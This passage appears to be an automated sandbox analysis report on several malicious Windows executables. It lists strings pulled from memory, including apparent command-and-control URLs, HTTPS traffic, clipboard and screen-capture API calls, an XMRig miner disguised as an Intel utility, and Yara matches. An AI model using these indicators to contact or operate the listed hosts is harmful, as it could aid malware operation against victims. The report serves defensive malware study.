Source: 3a1a782de7.exe, 0000000C.00000002.1807838541.0000000000945000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 0000000F.00000002.1868427762.000000000109B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: 3a1a782de7.exe, 0000000C.00000002.1807838541.0000000000945000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 0000000F.00000002.1868427762.000000000109B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: 3a1a782de7.exe, 0000000C.00000002.1807838541.0000000000945000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 0000000F.00000002.1868427762.000000000109B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: 3a1a782de7.exe, 0000000C.00000002.1807838541.0000000000945000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 0000000F.00000002.1868427762.000000000109B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: 3a1a782de7.exe, 0000000E.00000003.2031357954.00000000036AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 3a1a782de7.exe, 0000000E.00000003.2031357954.00000000036AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 3a1a782de7.exe, 0000000E.00000003.2031357954.00000000036AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 3a1a782de7.exe, 0000000E.00000003.2031357954.00000000036AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 3a1a782de7.exe, 0000000C.00000002.1807838541.0000000000945000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 0000000F.00000002.1868427762.000000000109B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: 3a1a782de7.exe, 0000000C.00000002.1807838541.0000000000945000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 0000000F.00000002.1868427762.000000000109B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: 3a1a782de7.exe, 0000000C.00000002.1807838541.0000000000945000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 0000000F.00000002.1868427762.000000000109B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: 3a1a782de7.exe, 0000000C.00000002.1807838541.0000000000945000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 0000000F.00000002.1868427762.000000000109B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: bc8eaffed4.exe, 00000014.00000003.1967470791.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnY322
Source: bc8eaffed4.exe, 00000014.00000003.1967470791.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: 3a1a782de7.exe, 0000000C.00000002.1807838541.0000000000945000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 0000000F.00000002.1868427762.000000000109B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: 3a1a782de7.exe, 0000000E.00000003.2031357954.00000000036AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: 3a1a782de7.exe, 0000000E.00000003.2031357954.00000000036AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: 3a1a782de7.exe, 0000000C.00000002.1807838541.0000000000945000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 0000000F.00000002.1868427762.000000000109B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: c46817b905.exe, 00000015.00000003.2082873938.00000000024C1000.00000004.00000020.00020000.00000000.sdmp, c46817b905.exe, 00000015.00000000.2079546275.0000000000423000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: http://usbtor.ru/viewtopic.php?t=798)Z
Source: 3a1a782de7.exe, 0000000E.00000003.2031357954.00000000036AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: 3a1a782de7.exe, 0000000E.00000003.2031357954.00000000036AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: svchost.exe, 00000008.00000002.1731968416.0000000000A3C000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://198.251.84.107:9254/dc33e47f6acdb4eefe/ahbjmv76.0lxxe
Source: svchost.exe, 00000008.00000002.1731968416.0000000000A3C000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://198.251.84.107:9254/dc33e47f6acdb4eefe/ahbjmv76.0lxxex
Source: 3a1a782de7.exe, 0000000E.00000003.1936742720.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1936660966.00000000035DB000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1936848702.00000000035D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 3a1a782de7.exe, 0000000E.00000003.2033029290.00000000035A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: 3a1a782de7.exe, 0000000E.00000003.1936742720.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1936660966.00000000035DB000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1936848702.00000000035D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 3a1a782de7.exe, 0000000E.00000003.1936742720.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1936660966.00000000035DB000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1936848702.00000000035D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 3a1a782de7.exe, 0000000E.00000003.1936742720.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1936660966.00000000035DB000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1936848702.00000000035D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 3a1a782de7.exe, 0000000E.00000003.2033029290.00000000035A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: bc8eaffed4.exe, 00000014.00000003.1967470791.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: bc8eaffed4.exe, 00000014.00000003.1967470791.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://curl.se/docs/hsts.html
Source: bc8eaffed4.exe, 00000014.00000003.1967470791.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: 3a1a782de7.exe, 0000000E.00000003.1936742720.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1936660966.00000000035DB000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1936848702.00000000035D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 3a1a782de7.exe, 0000000E.00000003.1936742720.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1936660966.00000000035DB000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1936848702.00000000035D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 3a1a782de7.exe, 0000000E.00000003.1936742720.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1936660966.00000000035DB000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1936848702.00000000035D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 3a1a782de7.exe, 0000000E.00000003.2118394181.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1935948006.0000000000E7C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/
Source: 3a1a782de7.exe, 0000000E.00000003.1935865202.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1935948006.0000000000E7C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/.
Source: 3a1a782de7.exe, 0000000E.00000003.1935709768.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/944
Source: 3a1a782de7.exe, 0000000E.00000003.1935865202.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1935948006.0000000000E7C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/C
Source: 3a1a782de7.exe, 0000000E.00000003.2086860865.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.2064502909.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.2064174110.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.2097831342.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000002.2166594545.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.2118394181.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/H
Source: 3a1a782de7.exe, 0000000E.00000002.2166594545.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/M
Source: 3a1a782de7.exe, 0000000E.00000003.2086860865.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.2097831342.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000002.2166594545.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/_
Source: 3a1a782de7.exe, 0000000E.00000003.2118394181.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1935865202.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.2029970890.0000000003629000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.2163840954.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.2029340811.0000000003626000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000002.2166594545.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.2029626618.0000000003626000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1935948006.0000000000E7C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/api
Source: 3a1a782de7.exe, 0000000E.00000003.2097831342.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.2118394181.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/api.V
Source: 3a1a782de7.exe, 0000000E.00000002.2166594545.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/api5
Source: 3a1a782de7.exe, 0000000E.00000003.2118394181.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.2163840954.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000002.2166594545.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/apiXV
Source: 3a1a782de7.exe, 0000000E.00000003.2097831342.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/apiY
Source: 3a1a782de7.exe, 0000000E.00000003.2118394181.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.2163840954.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000002.2166594545.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/apigs6#Y
Source: 3a1a782de7.exe, 0000000E.00000003.2097831342.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/apiore%#J
Source: 3a1a782de7.exe, 0000000E.00000003.2029728171.0000000003628000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.2029970890.0000000003629000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.2029340811.0000000003626000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.2029626618.0000000003626000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/apis
Source: 3a1a782de7.exe, 0000000E.00000003.1935865202.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1935948006.0000000000E7C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/apit
Source: 3a1a782de7.exe, 0000000E.00000003.1935709768.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/apit)0
Source: 3a1a782de7.exe, 0000000E.00000003.1935865202.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1935709768.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/apiy
Source: 3a1a782de7.exe, 0000000E.00000003.2064174110.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.2097831342.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/hne
Source: 3a1a782de7.exe, 0000000E.00000003.2097831342.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/ic
Source: 3a1a782de7.exe, 0000000E.00000003.2163840954.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000002.2166594545.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat/pi.V
Source: 3a1a782de7.exe, 0000000E.00000002.2166082658.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat:443/api
Source: 3a1a782de7.exe, 0000000E.00000003.2098065874.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat:443/apin
Source: bc8eaffed4.exe, 00000014.00000003.1967470791.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/ip
Source: bc8eaffed4.exe, 00000014.00000003.1967470791.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/ipbefore
Source: 3a1a782de7.exe, 0000000E.00000003.2033029290.00000000035A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: 44cc35716d.exe, 00000011.00000003.1946748605.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 00000011.00000002.1947390276.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 00000011.00000002.1947546587.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 00000011.00000003.1946353858.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 00000011.00000003.1946353858.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pancakedipyps.click/
Source: 44cc35716d.exe, 00000011.00000003.1946748605.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 00000011.00000003.1946353858.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pancakedipyps.click/2
Source: 44cc35716d.exe, 00000011.00000003.1946748605.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 00000011.00000002.1947546587.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 00000011.00000003.1946353858.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pancakedipyps.click/3#
Source: 44cc35716d.exe, 00000011.00000003.1946353858.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 00000011.00000003.1946748605.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 00000011.00000002.1947390276.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 00000011.00000003.1946614877.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 00000011.00000003.1946353858.0000000000D1A000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 00000011.00000002.1947447706.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 00000011.00000003.1946353858.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 00000011.00000002.1947447706.0000000000D1A000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 00000011.00000002.1947518575.0000000000D3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pancakedipyps.click/api
Source: 44cc35716d.exe, 00000011.00000002.1947390276.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 00000011.00000003.1946353858.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pancakedipyps.click/apiW
Source: 44cc35716d.exe, 00000011.00000003.1946748605.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 00000011.00000002.1947546587.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 00000011.00000003.1946353858.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pancakedipyps.click/apiW#
Source: 44cc35716d.exe, 00000011.00000003.1946748605.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 00000011.00000002.1947546587.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 00000011.00000003.1946353858.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pancakedipyps.click/pi.#
Source: 44cc35716d.exe, 00000011.00000003.1946614877.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 00000011.00000002.1947447706.0000000000D21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pancakedipyps.click:443/api
Source: 44cc35716d.exe, 00000011.00000003.1946614877.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 00000011.00000002.1947447706.0000000000D21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pancakedipyps.click:443/api6
Source: 3a1a782de7.exe, 0000000C.00000002.1807838541.0000000000945000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 0000000F.00000002.1868427762.000000000109B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: 3a1a782de7.exe, 0000000E.00000003.2032545720.00000000038C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 3a1a782de7.exe, 0000000E.00000003.2032545720.00000000038C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: 3a1a782de7.exe, 0000000E.00000003.1936742720.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1936660966.00000000035DB000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1936848702.00000000035D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: 3a1a782de7.exe, 0000000E.00000003.1936742720.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1936660966.00000000035DB000.00000004.00000800.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1936848702.00000000035D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 3a1a782de7.exe, 0000000E.00000003.2032371738.00000000036AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: 3a1a782de7.exe, 0000000E.00000003.2032545720.00000000038C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: 3a1a782de7.exe, 0000000E.00000003.2032545720.00000000038C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: 3a1a782de7.exe, 0000000E.00000003.2032545720.00000000038C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 3a1a782de7.exe, 0000000E.00000003.2032545720.00000000038C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: Intel_PTT_EK_Recertification.exe, 0000002C.00000003.2714354475.000001E0B2150000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/docs/algorithms
Source: Intel_PTT_EK_Recertification.exe, 0000002C.00000003.2714354475.000001E0B2150000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/wizard
Source: Intel_PTT_EK_Recertification.exe, 0000002C.00000003.2714354475.000001E0B2150000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/wizard%s

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50097
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50099
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50110
Source: unknown	Network traffic detected: HTTP traffic on port 50114 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50112 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50112
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50114
Source: unknown	Network traffic detected: HTTP traffic on port 50108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50099 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50110 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50108
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50097 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50103
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50103 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443

Source: unknown	HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.8:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.8:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.8:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.8:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.8:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.8:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.8:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.8:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.8:50097 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.8:50099 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.8:50103 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.8:50106 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.8:50108 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.8:50110 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.8:50112 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.8:50114 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe

Code function: 14_2_00430F40 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

14_2_00430F40

Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe

Code function: 14_2_00430F40 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

14_2_00430F40

Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe

Code function: 14_2_004310F0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

14_2_004310F0

Source: 4ec75545d6.exe, 00000007.00000003.1720228406.0000000005330000.00000004.00000001.00020000.00000000.sdmp

Binary or memory string: DirectInput8Create

memstr_6a7a9da2-9

Source: 4ec75545d6.exe, 00000007.00000003.1720228406.0000000005330000.00000004.00000001.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_24c3f6fc-5

Source: Yara match	File source: 8.3.svchost.exe.5300000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.4ec75545d6.exe.5550000.7.raw.unpack, type: UNPACKEDPE
